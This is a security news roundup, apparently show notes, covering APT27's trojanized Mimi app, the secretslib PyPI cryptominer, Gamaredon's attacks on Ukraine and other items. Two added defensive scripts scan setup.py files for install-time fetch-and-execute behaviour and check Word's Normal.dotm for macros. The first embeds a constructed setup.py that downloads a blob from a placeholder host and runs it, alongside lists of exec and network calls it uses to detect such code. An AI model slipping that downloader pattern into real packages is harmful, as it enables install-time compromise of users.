Chat app used as a backdoor
Two different security reports came out over the weekend detailing how the threat actor LuckyMouse, also known as APT27, used a trojanized version of the messaging app Mimi as a backdoor across Windows, macOS, and Linux. Both SEKOIA and Trend Micro found that LuckyMouse modified Mimi to install the HyperBro trojan, giving it a cross-platform backdoor. Targets appeared limited to individuals in Taiwan and the Philippines. SEKOIA notes that the macOS targeting makes this trojan particularly interesting, as it could be used against a broader swath of targets.
PyPI package drops cryptominer
A malicious module named “secretslib” was published on the Python Package Index on August 6th. It was described as a module designed for “secrets matching and verification made easy.” Security researcher Ax Sharma disclosed that the module covertly runs a cryptominer directly in RAM on Linux machines, executing a Linux executable retrieved from a remote server, which leaves no on-disk footprint of the mining activity. The party behind the package used the identity of a software engineer at the Argonne National Laboratory to lend it credibility. The module was downloaded 93 times before being removed.
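The pattern in this item, a package that fetches a binary from a remote server and runs it while being installed, shows up statically in setup.py as a network import sitting next to a call that executes a program. The script below is an added example for this page, not code from the secretslib report or from any real package: it parses setup.py with Python's standard ast module and reports that combination. Both sample sources are constructed, and the hostname example.invalid is a placeholder.

```python
"""Static check for install-time fetch-and-execute behaviour in a setup.py.

Added example for this item; it is not code from the secretslib report or
from any real package. It parses setup.py with the standard ast module and
flags a file that both imports a network module and calls something that
executes a program or arbitrary code, the combination behind an
install-time downloader. The two sample sources below are constructed.
"""
import ast
from pathlib import Path

NETWORK_MODULES = {"urllib", "requests", "socket", "http"}
EXEC_CALLS = {
    "os.system", "os.popen", "os.execv", "os.execvp",
    "subprocess.run", "subprocess.Popen", "subprocess.call",
    "subprocess.check_output", "exec", "eval",
}


def _dotted_name(node):
    """Return 'pkg.attr.attr' for a Name/Attribute chain, else None."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def scan_setup_source(source):
    """Scan one setup.py source string; returns the evidence and a verdict."""
    tree = ast.parse(source)
    network, execs = set(), set()
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for alias in node.names:
                if alias.name.split(".")[0] in NETWORK_MODULES:
                    network.add(alias.name)
        elif isinstance(node, ast.ImportFrom) and node.module:
            if node.module.split(".")[0] in NETWORK_MODULES:
                network.add(node.module)
        elif isinstance(node, ast.Call):
            name = _dotted_name(node.func)
            if name in EXEC_CALLS:
                execs.add(name)
    return {
        "network_imports": sorted(network),
        "exec_calls": sorted(execs),
        "suspicious": bool(network) and bool(execs),
    }


def scan_sdist_dir(root):
    """Scan every setup.py under an unpacked source distribution directory."""
    return {str(p): scan_setup_source(p.read_text(encoding="utf-8"))
            for p in Path(root).rglob("setup.py")}


# Constructed samples: a normal setup.py and one that downloads and runs a
# binary while the package is being installed.
BENIGN_SETUP = '''
from setuptools import setup
setup(name="example-pkg", version="0.1", packages=["example_pkg"])
'''

DOWNLOADER_SETUP = '''
from setuptools import setup
import subprocess, tempfile, urllib.request

def _stage():
    blob = urllib.request.urlopen("http://example.invalid/blob").read()
    path = tempfile.mktemp()
    open(path, "wb").write(blob)
    subprocess.run([path])

_stage()
setup(name="example-pkg", version="0.1")
'''

if __name__ == "__main__":
    for label, src in (("benign", BENIGN_SETUP), ("downloader", DOWNLOADER_SETUP)):
        print(label, scan_setup_source(src))
```

Run scan_sdist_dir on an unpacked sdist (pip download --no-binary :all: followed by tar xf) before installing from an unfamiliar publisher; a hit is a reason to read the file, not proof of malice, since some legitimate packages also shell out during build.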
Access to corporate networks sees a value dip
According to the security firm KELA, dark web markets selling initial access to corporate networks saw a dip in Q2. While the average number of listings per month remained flat compared to Q1, the average price for initial access fell 50% to $1,500, and the median dropped from $400 in Q1 to $300 in Q2. KELA suspects two factors are at play. One is the significant disruption to large-scale threat actors: DarkSide, Conti, and Lapsus$ have shut down, while LockBit and Hive have reduced their overall volume of activity. This is paired with a new trend of threat groups increasingly targeting mid-sized companies, which offer a balance of lower risk while still providing significant financial reward.
Researcher roots tractors
At the DEF CON security conference, a security researcher known as Sick Codes presented a new jailbreak for John Deere tractors, providing root access to the widely deployed 2630 and 4240 models. The jailbreak requires physical access to the tractor. Sick Codes said he’s unsure John Deere can patch this approach without implementing full disk encryption, which likely cannot be done on existing tractors. Tractor software access has been a persistent issue, with these essential pieces of farming equipment often ground zero for right-to-repair fights.
Thanks to today’s episode sponsor, 6clicks
Text-to-image engine about to go public
With the emergence of DALL-E 2 and other text-to-image engines, we’ve heard about the security and privacy implications inherent in this technology. Many of these systems can produce photorealistic output, but limited access has so far mitigated the possible damage. However, the startup Stability AI has released a DALL-E 2-like text-to-image AI system called Stable Diffusion to just over a thousand AI researchers, with plans for a full public launch in the coming weeks.
The engine can run on consumer GPUs with about 5 gigabytes of VRAM, producing a 512×512 pixel image. Stability AI will make Stable Diffusion available both as a cloud service with tunable filters as well as a local model for commercial purposes. The company plans to offer private models to paying customers and release tools for creating custom and fine-tuned models.
China publishes algorithm register
The Cyberspace Administration of China published a list of 30 algorithms used by many of the country’s most popular apps, including Taobao, WeChat, Meituan, and ByteDance’s Douyin. The list gives each algorithm a classification number and a brief description. In March, China passed new regulations requiring algorithm recommendation services to disclose the algorithms used in their apps. The descriptions do not provide technical details on how the algorithms work, but rather high-level overviews of their intended functions.
Gamaredon continues to hammer Ukraine with cyberattacks
A new report from security researchers at Symantec documents the most recent efforts by the Russian threat group Gamaredon, believed to be part of Russia’s FSB intelligence agency. The group continues to target Ukraine, a practice that goes as far back as 2014, long predating the current conflict. Its most recent wave of attacks ran from July 15th through August 8th. Attack vectors include phishing messages carrying a self-extracting zip file that fetches an XML file and eventually executes a PowerShell info-stealer. Researchers also saw the group using VBS downloaders to fetch the Pterodo backdoor, which lets the attackers turn on attached microphones, log keystrokes, take screenshots, and more. The most recent attack saw the group attempting to modify Microsoft Word’s default template, which could lace every newly created document with malicious code.
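Because every new document inherits from Word’s default template, a defender’s cheapest control is to baseline that file and alert when it changes or gains a macro project. The script below is an added example, not code from the Symantec report: a .dotm is an OOXML zip whose VBA code lives in the part word/vbaProject.bin, and an unmodified Normal.dotm carries no such part. The check records a SHA-256 baseline and reports a hash change or the appearance of a VBA project; the templates it uses are constructed in memory, and NORMAL_DOTM is the usual per-user path on Windows.

```python
"""Integrity check for Word's default template (Normal.dotm).

Added example for this item, not code from the Symantec report. A .dotm is an
OOXML zip; VBA macro code is stored in the part word/vbaProject.bin, and an
unmodified Normal.dotm carries no such part. The check records a SHA-256
baseline of the template and reports a hash change or the appearance of a VBA
project. The templates used below are constructed in memory, and the
NORMAL_DOTM path is the usual per-user location on Windows.
"""
import hashlib
import io
import os
import zipfile
from typing import Optional

NORMAL_DOTM = os.path.expandvars(r"%APPDATA%\Microsoft\Templates\Normal.dotm")


def sha256_bytes(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def template_has_vba(data: bytes) -> bool:
    """True if the OOXML zip contains a VBA project part."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return any(name.lower().endswith("vbaproject.bin") for name in zf.namelist())


def check_template(data: bytes, baseline_sha256: Optional[str]) -> dict:
    """Compare a template against a recorded baseline and inspect it for macros."""
    digest = sha256_bytes(data)
    return {
        "sha256": digest,
        "changed": baseline_sha256 is not None and digest != baseline_sha256,
        "has_vba": template_has_vba(data),
    }


def check_template_file(path: str = NORMAL_DOTM, baseline_sha256: Optional[str] = None) -> dict:
    """Same check against a template on disk."""
    with open(path, "rb") as fh:
        return check_template(fh.read(), baseline_sha256)


def build_template(with_vba: bool) -> bytes:
    """Construct a minimal .dotm-like zip (fixed timestamps, so output is deterministic)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        parts = [("[Content_Types].xml", b"<Types/>"), ("word/document.xml", b"<w:document/>")]
        if with_vba:
            parts.append(("word/vbaProject.bin", b"constructed placeholder, not real VBA"))
        for name, payload in parts:
            info = zipfile.ZipInfo(name, date_time=(2020, 1, 1, 0, 0, 0))
            info.compress_type = zipfile.ZIP_DEFLATED
            zf.writestr(info, payload)
    return buf.getvalue()


if __name__ == "__main__":
    clean = build_template(with_vba=False)
    baseline = sha256_bytes(clean)
    print("clean:", check_template(clean, baseline))
    print("modified:", check_template(build_template(with_vba=True), baseline))
```

In practice the baseline hash is taken once from a known-good machine and the check is run periodically against check_template_file; a "changed" result with has_vba set is the strongest signal, while a hash change alone also follows legitimate edits to styles or AutoText, so it warrants a look rather than an automatic block.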
Your “you should have patched” Tuesday update: Patrick Wardle edition
Zoom released a patch for a “get-root” elevation-of-privilege bug in Zoom for Mac. Security researcher Patrick Wardle detailed the bug at DEF CON. It was a big DEF CON for Wardle, who also demonstrated an injection flaw in how macOS handles software updates that could give an attacker complete file access. He reported it to Apple under its bug bounty program, and Apple released patches in April and October 2021 to resolve the issues.